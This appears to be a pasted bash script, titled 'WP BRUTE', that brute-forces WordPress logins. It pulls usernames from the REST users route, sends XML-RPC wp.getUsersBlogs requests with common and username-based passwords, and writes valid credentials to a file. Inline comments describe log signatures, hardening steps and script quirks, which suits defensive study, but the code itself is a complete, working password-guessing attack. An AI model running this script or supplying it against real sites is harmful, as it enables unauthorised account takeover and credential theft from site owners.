
WP BRUTE

a guest
Oct 4th, 2018
  1. #!/bin/bash
  2. # WORDPRESS XMLRPC BRUTEFORCE
  3. # save password list with name > wordlist.txt
  4.  
  5. function _brute() {
         # Password-guessing routine against one WordPress site, given as a
         # base URL in $1. It lists account slugs from the REST users route,
         # then submits XML-RPC wp.getUsersBlogs calls with candidate
         # passwords and treats a response containing "blogName" as a valid
         # login. The first hit is appended to WORDPRESS-LOGIN.TXT and the
         # function returns 0; no explicit status is returned otherwise.
         #
         # Defender view: in server logs this is one GET of
         # /wp-json/wp/v2/users followed by a run of POSTs to /xmlrpc.php
         # from the same client. Hardening that addresses it: require
         # authentication for (or block) the users REST route, disable or
         # restrict xmlrpc.php where it is not needed, throttle failed
         # logins, and reject passwords equal to or derived from the
         # username.
         #
         # None of the variables below is declared local, so they persist in
         # the calling shell; USER and PWD reuse names the shell itself uses.
  6.     TARGET="${1}";
         # Collect every "slug" value from the users listing (PCRE match).
  7.     JSONUSER=$(curl -s "${TARGET}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
  8.     if [[ ! -z ${JSONUSER} ]];then
  9.         echo "INFO: ${TARGET} username found!"
  10.         for USER in ${JSONUSER};
  11.         do
                  # Candidates: five fixed common passwords, the slug itself,
                  # the slug with 123 appended, and an entry built from the
                  # contents of wordlist.txt in the current directory.
  12.             PASS=( '123456' '12345678' 'admin' 'qwerty' 'qwerty123' ''"${USER}"'' ''"${USER}123"'' ''"$(cat wordlist.txt | tr '\r\n' ' ')"'' );
  13.             for PWD in "${PASS[@]}";
  14.             do
                      # One POST per guess, each capped at 3 seconds by
                      # timeout. Every guess is a separate request, so the
                      # per-client request rate on xmlrpc.php is a usable
                      # detection signal.
  15.                 BRUTE=$(timeout 3 curl -s -X POST -d '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>'$USER'</value></param><param><value>'$PWD'</value></param></params></methodCall>' ${TARGET}/xmlrpc.php);
                      # Success test: the response body contains "blogName".
  16.                 if [[ ${BRUTE} =~ "blogName" ]];then
  17.                     echo "  FOUND!: ${TARGET} ${USER}:${PWD} saved to WORDPRESS-LOGIN.TXT";
                          # Clear-text credentials are appended to a file in
                          # the working directory; on a host that ran this
                          # script, that file is a forensic artifact.
  18.                     echo "${TARGET} ${USER}:${PWD}" >> WORDPRESS-LOGIN.TXT
                          # Stops at the first working pair for this target.
  19.                     return 0;
  20.                 else
  21.                     echo "  FAILED: ${TARGET} ${USER}:${PWD}";
  22.                 fi
  23.             done
  24.         done
  25.     else
             # Reached when no slug was extracted from the users listing; the
             # message text reads "can grab" although this is the failure path.
  26.         echo "ERROR: ${TARGET} can grab username";
  27.     fi
  28. }
  29.  
  30. _brute ${1}
       # Entry point: hands the first command-line argument to _brute as the
       # target base URL. The argument is not validated here.